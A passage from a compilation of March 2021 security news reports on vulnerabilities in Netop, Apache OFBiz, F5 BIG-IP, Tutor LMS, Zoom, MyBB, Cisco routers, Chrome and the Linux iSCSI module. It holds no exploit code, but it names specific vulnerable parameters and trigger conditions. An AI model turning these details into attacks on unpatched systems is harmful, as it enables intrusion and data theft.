injecting additional PowerShell scripts.
CVE-2021-27192 - A "Technical
Support" button in Netop's "about" menu can be exploited to gain privilege
escalation as a "system" user and execute arbitrary commands, restart Netop, and
shut down the computer.
CVE-2021-27193 - A privilege flaw in Netop's chat
plugin could be exploited to read and write arbitrary files in a "working
directory" that is used as a drop location for all files sent by the instructor.
Worse, this directory location can be changed remotely to overwrite any file on
the remote PC, including system executables.
CVE-2021-27193 is also rated 9.5
out of a maximum of 10 in the CVSS rating system, making it a critical
vulnerability.
Needless to say, the consequences of such exploitation could
be devastating. They range from the deployment of ransomware to the installation
of keylogging software to the chaining of CVE-2021-27195 and CVE-2021-27193 to
keep an eye on the webcams of individual computers running the software, McAfee
warned.
While most of the vulnerabilities have been fixed, the fixes put in place by
Netop still don't address the lack of network encryption, which is expected to
be implemented in a future update.
"An attacker doesn't have to compromise the school network; all they need is to find any network where this software is accessible, such as a library, coffee shop or home network," said researchers Sam Quinn and Douglas McKee. "It doesn't matter where one of these student's PCs gets compromised, as a well-designed malware could lay dormant and scan each network the infected PC connects to until it finds other vulnerable instances of Netop Vision Pro to further propagate the infection."
"Once these machines have been compromised, the remote attacker has full control
of the system since they inherit the System privileges. Nothing at this point,
could stop an attacker running as 'system' from accessing any files, terminating
any process, or reaping havoc on the compromised machine," they added.
The findings come at a time when the US investigative agency Federal Bureau warned last week of an increase in PYSA (aka Mespinoza) ransomware attacks targeting educational institutions in 12 US states and the UK.
We have asked Netop for more details on the security updates and will update this article as soon as we receive a response.
Critical RCE Vulnerability Found in Apache OFBiz ERP Software—Patch Now
23.3.2021
Vulnerebility
Thehackernews
The Apache Software Foundation on Friday addressed a high severity vulnerability in Apache OFBiz that could have allowed an unauthenticated adversary to remotely seize control of the open-source enterprise resource planning (ERP) system.
Tracked as CVE-2021-26295, the flaw affects all versions of the software prior to 17.12.06 and employs an "unsafe deserialization" as an attack vector to permit unauthorized remote attackers to execute arbitrary code on a server directly.
OFBiz is a Java-based web framework for automating enterprise processes and offers a wide range of functionality, including accounting, customer relationship management, manufacturing operations management, order management, supply chain fulfillment, and warehouse management system, among others.
Specifically, by exploiting this flaw, a malicious party can tamper with serialized data to insert arbitrary code that, when deserialized, can potentially result in remote code execution.
"An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz," OFBiz developer Jacques Le Roux noted.
Unsafe deserialization has been a source of data integrity and other security issues, with the Open Web Application Security Project (OWASP) noting that "data which is untrusted cannot be trusted to be well formed, [and that] malformed data or unexpected data could be used to abuse application logic, deny service, or execute arbitrary code, when deserialized."
r00t4dm at Cloud-Penetrating Arrow Lab, MagicZero from SGLAB of Legendsec at Qi'anxin Group, and Longofo at Knownsec 404 Team have been credited with reporting the vulnerability.
It's recommended to upgrade Apache OFBiz to the latest version (17.12.06) to mitigate the risk associated with the flaw.
A threat actor exploited 11 zero-day flaws in 2020 campaigns
21.3.2021
Vulnerebility
Securityaffairs
A hacking group has employed at least 11 zero-day flaws as part of an operation
that took place in 2020 and targeted Android, iOS, and Windows users.
Google’s Project Zero security team published a report about the activity of a
mysterious hacking group that operated over the course of 2020 and exploited at
least 11 zero-day vulnerabilities in its attacks on Android, iOS, and Windows
users.
Google researchers observed two separate waves of attacks that took place in
February and October 2020, respectively. Threat actors set up malicious sites in
a series of watering hole attacks that were redirecting visitors to exploit
servers hosting exploit chains for Android, Windows, and iOS devices.
“In October 2020, Google Project Zero discovered seven 0-day exploits being actively used in-the-wild. These exploits were delivered via “watering hole” attacks in a handful of websites pointing to two exploit servers that hosted exploit chains for Android, Windows, and iOS devices.” wrote the popular Project Zero researcher Maddie Stone. “These attacks appear to be the next iteration of the campaign discovered in February 2020 and documented in this blog post series.”
Since February 2020, the same hacking group set up at least a couple dozen websites in its attacks, experts noticed that the threat actors relied on both zero-day vulnerabilities and known flaws.
Nonetheless, the threat actor behind the attacks also showed the ability to replace zero-days on the fly once one was detected and patched by software vendors.
Below the exploits that were delivered based on the device and browser in the last wave of attacks:
Exploit Server Platform Browser Renderer RCE Sandbox Escape Local Privilege
Escalation
1 iOS Safari Stack R/W via Type 1 Fonts (CVE-2020-27930) Not
needed Info leak via mach message trailers (CVE-2020-27950)Type confusion with
turnstiles (CVE-2020-27932)
1 Windows Chrome Freetype heap buffer
overflow(CVE-2020-15999) Not needed cng.sys heap buffer overflow
(CVE-2020-17087)
1 Android** Note: This was only delivered after #2 went down
and CVE-2020-15999 was patched. Chrome V8 type confusion in TurboFan
(CVE-2020-16009) Unknown Unknown
2 Android Chrome Freetype heap buffer
overflow(CVE-2020-15999) Chrome for Android head buffer overflow
(CVE-2020-16010) Unknown
2 Android Samsung Browser Freetype heap buffer
overflow(CVE-2020-15999) Chromium n-day Unknown
Below the list of zero-day
flaws exploited in the February 2020 campaign:
CVE-2020-6418 – Chrome
Vulnerability in TurboFan
CVE-2020-0938 – Font Vulnerability on Windows
CVE-2020-1020 – Font Vulnerability on Windows
CVE-2020-1027 – Windows CSRSS
Vulnerability
while the zero-day flaws exploited in the October 2020 attacks
are:
CVE-2020-15999 – Chrome Freetype heap buffer overflow
CVE-2020-17087 –
Windows heap buffer overflow in cng.sys
CVE-2020-16009 – Chrome type
confusion in TurboFan map deprecation
CVE-2020-16010 – Chrome for Android
heap buffer overflow
CVE-2020-27930 – Safari arbitrary stack read/write via
Type 1 fonts
CVE-2020-27950 – iOS XNU kernel memory disclosure in mach
message trailers
CVE-2020-27932 – iOS kernel type confusion with turnstiles
At the time of this writing, Google has yet to attribute these campaigns to any
specific threat actor and it is still unclear if the attacks have been conducted
by a nation-state actor.
“The vulnerabilities cover a fairly broad spectrum of issues – from a modern JIT vulnerability to a large cache of font bugs. Overall each of the exploits themselves showed an expert understanding of exploit development and the vulnerability being exploited. In the case of the Chrome Freetype 0-day, the exploitation method was novel to Project Zero.” concludes the post. “Project Zero closed out 2020 with lots of long days analyzing lots of 0-day exploit chains and seven 0-day exploits. When combined with their earlier 2020 operation, the actor used at least 11 0-days in less than a year.”
Critical F5 BIG-IP Flaw Now Under Active Attack
20.3.2021 Vulnerebility Threatpost
Researchers are reporting mass scanning for – and in-the-wild exploitation of – a critical-severity flaw in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure.
Attackers are exploiting a recently-patched, critical vulnerability in F5 devices that have not yet been updated.
The unauthenticated remote command execution flaw (CVE-2021-22986) exists in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure, and could allow attackers to take full control over a vulnerable system.
Earlier in March, F5 issued a patch for the flaw, which has a CVSS rating of 9.8 and exists in the iControl REST interface. After the patch was issued, several researchers posted proof-of-concept (PoC) exploit code after reverse engineering the Java software patch in BIG-IP.
Fast forward to this week, researchers reported mass scanning for – and in-the-wild exploitation of – the flaw.
“Starting this week and especially in the last 24 hours (March 18th, 2021) we have observed multiple exploitation attempts against our honeypot infrastructure,” said researchers with the NCC Group on Thursday. “This knowledge, combined with having reproduced the full exploit-chain we assess that a public exploit is likely to be available in the public domain soon.”
CISA, Researchers Urge Updating
The U.S. Cybersecurity and Infrastructure
Agency (CISA) has urged companies using BIG-IP and BIG-IQ to fix the critical F5
flaw, along with another bug being tracked as CVE-2021-22987. This flaw, with a
CVSS rating of 9.9, affects the infrastructure’s Traffic Management User
Interface (TMUI), also referred to as the Configuration utility. When running in
Appliance mode, the TMUI has an authenticated RCE vulnerability in undisclosed
pages.
The scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world’s biggest financial institutions and ISPs.
“The F5 BIG-IP is a very juicy target due to the fact that it can handle highly sensitive data,” said Craig Young, principal security researcher at Tripwire in an email. “An attacker with full control over a load balancing appliance can also take control over the web applications served through it.”
It’s not clear who is behind the exploitations; Threatpost has reached out to NCC Group for further comment.
Other Active Exploits of F5 Flaws
Security experts in July urged companies to
deploy an urgent patch for a critical vulnerability in F5 Networks’ networking
devices, which was being actively exploited by attackers to scrape credentials,
launch malware and more. The critical remote code-execution flaw (CVE-2020-5902)
had a CVSS score of 10 out of 10.
And in September, the U.S. government warned that Chinese threat actors successfully compromised several government and private sector entities by exploiting vulnerabilities in F5 BIG-IP devices (as well as Citrix and Pulse Secure VPNs and Microsoft Exchange servers).
For this latest rash of exploit attempts, anyone running an affected version of BIG-IP should prioritize upgrade, said Young.
“Any organization running BIG-IP or other network appliance with the management access exposed to the Internet should be re-evaluating their network layout and bringing those assets onto private networks,” he said.
Threat actors are attempting to exploit CVE-2021-22986 in F5 BIG-IP devices in
the wild
20.3.2021
Vulnerebility
Securityaffairs
Cybersecurity experts warn of ongoing attacks aimed at exploiting a recently
patched critical vulnerability in F5 BIG-IP and BIG-IQ networking devices.
Cybersecurity experts from NCC Group and Bad Packets security firm this week
detected a wave of attacks exploiting a recently patched critical vulnerability,
tracked as CVE-2021-22986, in F5 BIG-IP and BIG-IQ networking devices.
“After seeing lots of broken exploits and failed attempts, we are now seeing
successful in the wild exploitation of this vulnerability, as of this morning”
said Rich Warren, red team expert at NCC Group.
F5 BIG-IP attacks
In early
March, the security vendor has released security updates for seven
vulnerabilities in BIG-IP products, four have been rated as critical severity,
two other issues have been rated high and one medium severity.
CVE-2021-22986 is an unauthenticated remote command execution vulnerability that resides in the iControl REST interface. The flaw received a CVSS score of 9.8 and affects BIG-IP and BIG-IQ.
The vulnerability could be exploited by unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services.
“We strongly encourage all customers to update their BIG-IP and BIG-IQ systems to a fixed version as soon as possible.” reads the advisory published by F5.
The attacks started shortly after some security researchers have already released proof-of-concept exploit code for the above vulnerability.
NCC Group released indicators of compromise for the above attacks, along with detection logic, and Suricata network rules.
“In the week that followed, several researchers posted proof-of-concept code
after reverse engineering the Java software patch in BIG-IP.” reads the post
published by NCC Group.
“Starting this week and especially in the last 24
hours (March 18th, 2021) we have observed multiple exploitation attempts against
our honeypot infrastructure. This knowledge, combined with having reproduced the
full exploit-chain we assess that a public exploit is likely to be available in
the public domain soon.”
Update:
Researchers at Palo Alto Networks are also observing a Mirai variant from attempting to exploit the CVE-2021-22986 and CVE-2020-28188.
Tutor LMS for WordPress Open to Info-Stealing Security Holes
19.3.2021
Vulnerebility
Threatpost
The popular
learning-management system for teacher-student communication is rife with
SQL-injection vulnerabilities.
Security vulnerabilities in Tutor LMS, a WordPress plugin installed on more than 20,000 sites, open the door to information theft and privilege escalation, according to researchers.
Tutor LMS is a learning-management system for educators that allows them to digitally reach their students. It supports course-building, student forums, multimedia classes and more. According to an analysis from Wordfence, there are five critical SQL-injection flaws in the plugin, and at least one high-severity bug stemming from unprotected AJAX endpoints.
The former “make it possible for attackers to obtain information stored in a site’s database, including user credentials, site options and other sensitive information,” researchers explained, in a posting this week.
The remaining flaws allow authenticated attackers to elevate user privileges and alter course content and settings, through the use of various AJAX actions.
Site administrators should update to the patched version, Tutor LMS v.1.8.3.
Medium-Severity SQL-Injection Bugs
The five SQL-injection vulnerabilities all
rate 6.5 out of 10 on the CVSS vulnerability-rating scale, making them medium in
severity. CVEs are pending for all.
The first SQL-injection issue exists in a review feature in Tutor LMS that
allows students to rate their courses.
Tutor LMS offers a range of digital learning features. Click to enlarge.
To enter a rating, the plugin uses an AJAX action to process the request, according to Wordfence. If a review already exists for the current user and course, it will update the rating – if it’s new, it will create a new review and rating and add it to the database.
“By using get_var() without the use of prepare() when checking for the existence of a review, along with no SQL sanitization on the user-supplied variables, a user could inject arbitrary SQL statements while leaving a review,” researchers explained, adding that a user would need to be authenticated to carry out an attack (though creating a student profile can be easy).
The injected arbitrary SQL statements could open the door to snatching information from the site’s database, including login details for users.
“In some cases, where a MySQL server is insecurely configured, this could allow an attacker to read files and create new files containing web shells along with modifying information in the database,” researchers added.
Another SQL-injection issue was found in the ability for teachers to mark answers as correct once they have been submitted by a student.
In this case, the plugin uses an AJAX action to retrieve the initial student
answer recorded in the database, while using the user-supplied value from the
POST parameter answer_id as the answer ID.
Gradebooks in Tutor LMS. Click to enlarge.
“Unfortunately, there was no SQL sanitization on the user-supplied value, nor was the function using a prepared statement, making it possible for SQL queries to be injected,” according to Wordfence.
Researchers added, “This functionality was intended to be used by teachers and administrators only, however, since it was an AJAX action with no nonce protection or capability checks in place, this meant that any authenticated user, including students, had the ability to execute this action and exploit the SQL injection vulnerability.”
The team also found three UNION-based SQL-injection vulnerabilities. This type of weakness occurs when an SQL query can be joined to an already existing query, using a UNION operator. UNION operators combine results of two different queries together.
“This differs from the previous two SQL-injection types discussed because data can easily be extracted by simply adding an additional query to the already existing query, through the use of the UNION operator,” researchers explained. “This is one of the simplest, and easiest, forms of SQL-injection vulnerability that can be exploited.”
UNION-Based SQL Bugs
The first of these vulnerabilities exists in the Tutor
LMS feature that allows teachers to retrieve a set of answers for a given
question, while analyzing the response of students.
In order to provide this functionality, the plugin uses “get_results()” to obtain the answers from the database.
“Again, there was no SQL sanitization on the user-supplied input, nor was there
any use of prepared statements,” researchers said. “This made it possible for an
attacker to supply a UNION query in the ‘question_id’ parameter that would
execute and provide the direct results of the query in the response to the
request.”
The Tutor LMS quiz-builder. Click to enlarge.
The second UNION-based bug lies in the ability to build quizzes as a teacher on a site. The function uses various AJAX actions to make the quiz-building process easy and require fewer page reloads.
“When the ‘question_id’ parameter is supplied, the function uses ‘get_row()’ to obtain the answer data from the database,” according to Wordfence. Here again, there was no SQL sanitization on the user-supplied input.
“This function, along with the tutor_quiz_builder_get_answers_by_question() function, were intended to be for instructor and administrator use only,” explained the researchers. “Unfortunately, however, since they were AJAX actions with no nonce protection or capability checks in place, any authenticated user, including students, had the ability to execute this action and exploit the SQL-injection vulnerability.”
The last SQL injection vulnerability also stems from the quiz-creation feature. Whenever a student takes a quiz, the plugin records the results, but also allows students to go back later and change their answers.
“While retrieving those results, the function used ‘get_results()’ to retrieve the results from the database,” according to the analysis. “Due to the fact that there was no SQL-escaping on the quiz answers as they were recorded, SQL statements could be included as a quiz response. Once the data was retrieved from the database upon accessing the attempt details page, the stored SQL statements would execute and supply the requested information from the database.”
Unprotected AJAX Endpoints
And finally, Wordfence uncovered a raft of
unprotected AJAX endpoints.
These “could allow low-level users like students to perform a plethora of actions that allowed them to create new quizzes, modify course information, change grades, escalate privileges and more,” according to researchers.
The most serious of these is the aforementioned high-severity privilege-escalation bug, which has a CVSS score of 8.1.
Tutor LMS allows two roles: Student or instructor. Students can request to become a teacher, and administrators can directly create new instructors on a given site.
“Unfortunately, both of these features were insecurely implemented,” according to the firm. “Unfortunately, the approval process was vulnerable due to a lack of a capability check, and authenticated students could approve themselves as instructors.”
Additionally, administrators have the option to add new instructors outside of the standard WordPress new user functionality.
“Unfortunately, there was no capability check on this AJAX action so any authenticated user could add a new instructor account and then use that to create potentially malicious content on a site,” researchers explained.
The Perils of Plugins for WordPress
This year is shaping up to be a banner
year for WordPress plugin problems, with several coming to light in the first
quarter of 2021 alone.
Last week, the Plus Addons for Elementor plugin was found to have a critical security vulnerability that attackers can exploit to quickly, easily and remotely take over a website. First reported as a zero-day bug, researchers said it’s being actively attacked in the wild.
In February, an unpatched, stored cross-site scripting (XSS) security bug was found to potentially affect 50,000 Contact Form 7 Style plugin users.
And in January, researchers warned of two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.
Also that month, a plugin called PopUp Builder, used by WordPress websites for building pop-up ads for newsletter subscriptions, was found to have a vulnerability could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.
Zoom Screen-Sharing Glitch ‘Briefly’ Leaks Sensitive Data
19.3.2021
Vulnerebility
Threatpost
A glitch in Zoom’s
screen-sharing feature shows parts of presenters’ screens that they did not
intend to share – potentially leaking emails or passwords.
A security blip in the current version of Zoom could inadvertently leak users’ data to other meeting participants on a call. However, the data is only leaked briefly, making a potential attack difficult to carry out.
The flaw (CVE-2021-28133) stems from a glitch in the screen sharing function of video conferencing platform Zoom. This function allows users to share the contents of their screen with other participants in a Zoom conferencing call. They have the option to share their entire screen, one or more application windows or just one selected area of their screen.
However, “under certain conditions” if a Zoom presenter chooses to share one
application window, the share-screen feature briefly transmits content of other
application windows to meeting participants, according to German-based SySS
security consultant Michael Strametz, who discovered the flaw, and researcher
Matthias Deeg, in a Thursday disclosure advisory (which has been translated via
Google).
“The impact in real-life situations would be sharing confidential
data in an unintended way to unauthorized people,” Deeg told Threatpost.
The current Zoom client version, 5.5.4 (13142.0301), for Windows is still vulnerable to the issue, Deeg told Threatpost.
The issue occurs in a “reliably reproducible manner” when a user shares one split application window (such as presentation slides in a web browser) while opening other applications (such as a mail client) in the background, in what is supposed to be in non-shared mode. Researchers found, the contents of the explicitly non-shared application window can be perceived for a “brief moment” by meeting participants.
While this would only occur briefly, researchers warn that other meeting participants who are recording the Zoom meeting (either through Zoom’s built-in recording capabilities or via screen recording software like SimpleScreenRecorder) are able to then go back to the recording and fully view any potentially sensitive data leaked through that transmission.
Because this bug would be difficult to actually intentionally exploit (an attacker would need to be a participant in a meeting where data is inadvertently leaked by the bug) the flaw is only medium-severity (5.7 out of 10) on the CVSS scale.
However, “the severity of this issue really depends on the unintended shared data,” Deeg told Threatpost. “In some cases, it doesn’t matter, in other cases, it may cause more trouble.”
For instance, if conference or webinar panelist was presenting slides to attendees via Zoom, and then opened a password manager or email application in the background, other Zoom participants would be able to access this information.
A proof-of-concept video of the attack is below:
The vulnerability was reported to Zoom on Dec. 2 – however, as of the date of public disclosure of the flaw, on Thursday, researchers said they are “not aware of a fix” despite several inquiries for status updates from Zoom.
“Unfortunately, our questions concerning status updates on January 21 and February 1, 2021, remained unanswered,” Deeg told Threatpost. “I hope that Zoom will soon fix this issue and my only advice for all Zoom users… is to be careful when using the screen sharing functionality and [to follow a] strict ‘clean virtual desktop’ policy during Zoom meetings.”
Threatpost has reached out to Zoom for further comment regarding the flaw, and whether it will be fixed in the upcoming release that’s scheduled to go live March 22.
“Zoom takes all reports of security vulnerabilities seriously,” a Zoom spokesperson told Threatpost. “We are aware of this issue, and are working to resolve it.”
With the coronavirus pandemic driving more organizations to “flatten the curve” by going remote over the past year – and thus various web conferencing platforms – Zoom has been grappling with various security and privacy issues, including attackers hijacking online meetings in what are called Zoom bombing attacks. Other security issues have come to light in Zoom’s platform over the past year – such as one that could have allowed attackers to crack private meeting passcodes and snoop in on video conferences. However, Zoom has also taken important steps to secure its conferencing platform, including beefing up its end-to-end encryption and implementing other security measures.
New Zoom Screen-Sharing Bug Lets Other Users Access Restricted Apps
19.3.2021
Vulnerebility
Thehackernews
A newly discovered glitch in Zoom's screen sharing feature can accidentally leak sensitive information to other attendees in a call, according to the latest findings.
Tracked as CVE-2021-28133, the unpatched security vulnerability makes it possible to reveal contents of applications that are not shared, but only briefly, thereby making it harder to exploit it in the wild.
It's worth pointing out that the screen sharing functionality in Zoom lets users share an entire desktop or phone screen or limit sharing to one or more specific applications or a portion of a screen. The issue stems from the fact that a second application that's overlayed on top of an already shared application can reveal its contents for a short period of time.
"When a Zoom user shares a specific application window via the 'share screen'
functionality, other meeting participants can briefly see contents of other
application windows which were not explicitly shared," SySS researchers Michael
Strametz and Matthias Deeg noted. "The contents of not shared application
windows can, for instance, be seen for a short period of time by other users
when those windows overlay the shared application window and get into focus."
The flaw, which was tested on versions 5.4.3 and 5.5.4 across both Windows and Linux clients, is said to have been disclosed to the videoconferencing company on December 2, 2020. The lack of a fix even after three months could be attributed in part to the difficulty in exploiting the vulnerability.
But nonetheless, this could have serious consequences depending on the nature of the inadvertently shared data, the researchers warned, adding a malicious participant of a Zoom meeting can take advantage of the weakness by making use of a screen capture tool to record the meeting and playback the recording to view the private information.
We have reached out to Zoom for more details on the fix, and we will update the story if we hear back.
Critical RCE Flaw Reported in MyBB Forum Software—Patch Your Sites
19.3.2021
Vulnerebility
Thehackernews
A pair of critical vulnerabilities in a popular bulletin board software called MyBB could have been chained together to achieve remote code execution (RCE) without the need for prior access to a privileged account.
The flaws, which were discovered by independent security researchers Simon Scannell and Carl Smith, were reported to the MyBB Team on February 22, following which it released an update (version 1.8.26) on March 10 addressing the issues.
MyBB, formerly MyBBoard and originally MyBulletinBoard, is free and open-source forum software developed using PHP and MySQL.
According to the researchers, the first issue — a nested auto URL persistent XSS vulnerability (CVE-2021-27889) — stems from how MyBB parses messages containing URLs during the rendering process, thus enabling any unprivileged forum user to embed stored XSS payloads into threads, posts, and even private messages.
"The vulnerability can be exploited with minimal user interaction by saving a maliciously crafted MyCode message on the server (e.g. as a post or Private Message) and pointing a victim to a page where the content is parsed," MyBB said in an advisory.
The second vulnerability concerns an SQL injection (CVE-2021-27890) in a forum's theme manager that could result in an authenticated RCE. A successful exploitation occurs when a forum administrator with the "Can manage themes?" permission imports a maliciously crafted theme, or a user, for whom the theme has been set, visits a forum page.
"A sophisticated attacker could develop an exploit for the Stored XSS vulnerability and then send a private message to a targeted administrator of a MyBB board," the researchers outlined in a technical write-up. "As soon as the administrator opens the private message, on his own trusted forum, the exploit triggers. An RCE vulnerability is automatically exploited in the background and leads to a full takeover of the targeted MyBB forum."
Besides the two aforementioned vulnerabilities, version 1.8.26 also resolves four other security shortcomings that were identified by the MyBB Team, including —
CVE-2021-27946 - Improper validation of the number of votes in thread poll
options, leading to SQL injection
CVE-2021-27947 - Improper sanitization of
certain forum data, causing SQL injection when used in subsequent queries
CVE-2021-27948 - Additional User Groups ID numbers can be saved without proper
validation in the Admin Control Panel, resulting in SQL injection, and
CVE-2021-27949 - A reflected XSS vulnerability in custom Moderator Tools, when
user input attached to CSRF token-protected POST requests is not properly
sanitized
MyBB users are advised to upgrade to the latest version to mitigate
the risk associated with the flaws.
Cisco Plugs Security Hole in Small Business Routers
18.3.2021
Vulnerebility
Threatpost
The Cisco security vulnerability exists in the RV132W ADSL2+ Wireless-N VPN Routers and RV134W VDSL2 Wireless-AC VPN Routers.
A popular line of small business routers made by Cisco Systems are vulnerable to a high-severity vulnerability. If exploited, the flaw could allow a remote – albeit authenticated – attacker to execute code or restart affected devices unexpectedly.
Cisco issued fixes on Wednesday for the flaw in its RV132W ADSL2+ Wireless-N VPN routers and RV134W VDSL2 Wireless-AC VPN routers. These routers are described by Cisco as “networking-in-a-box” models that are targeted for small or home offices and smaller deployments.
The vulnerability (CVE-2021-1287) stems from an issue in the routers’ web-based management interface. It ranks 7.2 out of 10 on the CVSS scale, making it high severity.
“A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition on the affected device,” said Cisco on Wednesday.
The Cisco Router Vulnerability
The vulnerability stems from the routers’
web-based management interface improperly validating user-supplied input, said
Cisco. An attacker could exploit this vulnerability by sending crafted HTTP
requests to an affected device – however, of note the attacker would need to
first be authenticated to the device (which could be achieved via a phishing
attack or other malicious attack, for instance).
Affected are RV132W ADSL2+ Wireless-N VPN routers running a firmware release earlier than Release 1.0.1.15 (which is fixed); and RV134W VDSL2 Wireless-AC VPN Routers running a firmware release earlier than Release 1.0.1.21 (the fixed version). Shizhi He of Wuhan University was credited with reporting the flaw.
“The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory,” said Cisco.
Cisco Flaws: Patches Issued This Year
The patch is only the latest from Cisco
this year. In February, Cisco rolled out fixes for critical holes in its lineup
of small-business VPN routers, which could be exploited by unauthenticated,
remote attackers to view or tamper with data, and perform other unauthorized
actions on the routers.
In 2021, Cisco also patched various vulnerabilities across its product lineup, including multiple, critical vulnerabilities in its software-defined networking for wide-area networks (SD-WAN) solutions for business users, and a high-severity flaw in its smart Wi-Fi solution for retailers that could allow a remote attacker to alter the password of any account user on affected systems.
New Mirai Variant Leverages 10 Vulnerabilities to Hijack IoT Devices
18.3.2021
IoT Vulnerebility
Securityweek
Over the past month, a variant of the Mirai botnet was observed targeting new security vulnerabilities within hours after they had been disclosed publicly, researchers with Palo Alto Networks reveal.
Around since 2016, Mirai has had its source code leaked online, which resulted in tens of variants being released over the years, each with its own targeting capabilities.
What makes the variant tracked by Palo Alto Networks stand out in the crowd is the fact that, within a four-week timeframe, it started exploiting several vulnerabilities that have been disclosed this year.
On February 23, the Mirai variant was observed targeting CVE-2021-27561 and CVE-2021-27562, two vulnerabilities in the Yealink DM (Device Management) platform that had been disclosed the very same day.
Impacting Yealink DM version 3.6.0.20 and older, the flaws (pre-auth SSRF and command injection, respectively) exist because user-provided data is not properly filtered and could be exploited to execute arbitrary commands as root, without authentication.
On March 3, Palo Alto Networks’ security researchers noticed that the same samples were also using an exploit for CVE-2021-22502, a critical (CVSS score of 9.8) remote code execution vulnerability in Micro Focus Operations Bridge Reporter.
Exploitable without authentication, the security bug exists because a user-supplied string isn’t properly validated when the Token parameter provided to the LogonResource endpoint is handled, allowing an attacker to execute code as root.
Ten days later, on March 13, the samples also incorporated an exploit targeting CVE-2020-26919, a critical vulnerability (CVSS score 9.8) affecting NETGEAR JGS516PE business-grade gigabit switches. The bug is described as “lack of access control at the function level.”
In September 2020, Netgear published an advisory for this vulnerability, advising customers to update the firmware on their devices.
Other vulnerabilities being exploited in these attacks include a SonicWall SSL-VPN bug referred to as VisualDoor, CVE-2020-25506 (D-Link DNS-320 firewall), CVE-2020-26919 (Netgear ProSAFE Plus), and CVE-2019-19356 (Netis WF2419 wireless router). Three other security issues are also being exploited, but they haven’t been identified yet.
“The attacks are still ongoing at the time of this writing. Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” Palo Alto Networks reveals.
Google Warns Mac, Windows Users of Chrome Zero-Day Flaw
16.3.2021
Vulnerebility
Threatpost
The use-after-free vulnerability is the third Google Chrome zero-day flaw to be disclosed in three months.
Google is hurrying out a fix for a vulnerability in its Chrome browser that’s under active attack – its third zero-day flaw so far this year. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems.
The vulnerability exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.
“The Stable channel has been updated to 89.0.4389.90 for Windows, Mac and Linux which will roll out over the coming days/weeks,” according to Google’s Friday security update.
The flaw (CVE-2021-21193) ranks 8.8 out of 10 on the CVSS vulnerability-rating scale, making it high-severity. It’s a use-after-free vulnerability, which relates to incorrect use of dynamic memory during program operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to hack the program, according to a description of the vulnerability.
Use-After-Free Zero-Day Flaw
According to an IBM X-Force vulnerability
report, the flaw could allow a remote attacker to execute arbitrary code on the
system.
“By persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,” according to the report.
Further details are scant because “access to bug details and links may be kept restricted until a majority of users are updated with a fix,” according to Google. The bug was credited to an anonymous reporter.
Google also did not provide further specifics on the exploits other than to say it “is aware of reports that an exploit for CVE-2021-21193 exists in the wild.”
Threatpost has reached out to Google for further comment.
Other Google Chrome Security Flaws
Beyond the zero-day flaw, Google issued
four other security fixes on Friday.
These included another high-severity use-after-free flaw (CVE-2021-21191), which exists in WebRTC. WebRTC, which stands for web real-time communications, is an open-source project that gives web browsers and mobile applications interactive communications capabilities (such as voice, video and chat). The flaw was reported by someone who goes under the alias “raven” (@raid_akame on Twitter).
Another high-severity flaw is a heap-buffer overflow error (CVE-2021-21192) that stems from Chrome tab groups. The flaw was reported by Abdulrahman Alqabandi with Microsoft Browser Vulnerability Research.
Third Zero-Day Chrome Security Flaw This Year
The use-after-free flaw is the
third zero-day flaw to plague Google’s Chrome browser in the past three months —
and the second this month alone. Earlier in March, Google said it fixed a
high-severity zero-day vulnerability in its Chrome browser, which stems from the
audio component of the browser.
And in February, Google warned of a zero-day vulnerability in its V8 open-source web engine that’s being actively exploited by attackers; a patch for which was issued in version 88 of Google’s Chrome browser.
Chrome will in many cases update to its newest version automatically — however, Chrome users can double check if an update has been applied:
Google Chrome users can go to chrome://settings/help by clicking Settings >
About Chrome
If an update is available Chrome will notify users and then
start the download process
Users can then relaunch the browser to complete
the update
Experts found three new 15-year-old bugs in a Linux kernel module
14.3.2021
Vulnerebility
Securityaffairs
Three 15-year-old flaws in Linux kernel could be exploited by local attackers
with basic user privileges to gain root privileges on vulnerable Linux systems.
GRIMM researchers found three vulnerabilities in the SCSI (Small Computer System
Interface) component of the Linux kernel, the issues could be exploited by local
attackers with basic user privileges to gain root privileges on unpatched Linux
systems.
The Small Computer Systems Interface defined both a parallel I/O bus and a data
protocol to connect a wide variety of peripherals (disk drives, tape drives,
modems, printers, scanners, optical drives, test equipment, and medical devices)
to a host computer.
The flaws were present in the component since it was
being developed in 2006.
The first vulnerability, tracked as CVE-2021-27365, is a heap buffer overflow in the iSCSI subsystem.
“The vulnerability is triggered by setting an iSCSI string attribute to a value
larger than one page, and then trying to read it.” reads the analysis published
by GRIMM researchers. “More specifically, an unprivileged user can send netlink
messages to the iSCSI subsystem (in drivers/scsi/scsi_transport_iscsi.c) which
sets attributes related to the iSCSI connection, such as hostname, username,
etc, via the helper functions in drivers/scsi/libiscsi.c. These attributes are
only limited in size by the maximum length of a netlink message (either 232 or
216 depending on the specific code processing the message).”
The second
vulnerability, tracked as CVE-2021-27363, is a heap overflow vulnerability. The
researchers discovered a kernel pointer leak that can be used to determine the
address of the iscsi_transport structure.
The last flaw, tracked as CVE-2021-27364, is an out-of-bounds kernel read issue that resides in the libiscsi module (drivers/scsi/libiscsi.c).
